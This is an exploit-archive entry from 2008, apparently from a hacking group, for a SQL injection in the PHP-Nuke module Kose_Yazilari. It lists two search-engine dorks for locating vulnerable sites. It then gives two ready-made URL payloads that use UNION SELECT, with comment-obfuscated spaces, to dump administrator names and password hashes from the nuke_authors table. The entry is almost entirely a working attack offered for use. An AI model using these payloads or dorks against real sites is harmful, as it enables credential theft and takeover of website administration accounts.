[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability
# Published : 2008-02-25
# Author : xcorpitx
# Previous Title : PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability
# Next Title : MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability
## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##
########################### Turkey ####################################
# #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
# PHP-Nuke (Kose_Yazilari) SQL Injection Vulnerability
#
#######################################################################
#
# AUTHOR : xcorpitx
#
# HOME : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################
# WHEN YOU PUT THIS SQL CODE YOU can SEE ADM??N NAME,ADMIN HASH
########################################################################
#
# DorK 1 : ''name Kose_Yazilari op viewarticle artid''
# Dork 2 : ''name Kose_Yazilari op printpage artid''
########################################################################
#
# EXPLOIT:
#
########################################################################
#
#
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
#
#
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors
#
########################################################################
Thank my friends : pc faresi, hayalet,D3ng3s!z,SmoKin,apex,mostbiq
# www.Syue.com [2008-02-25]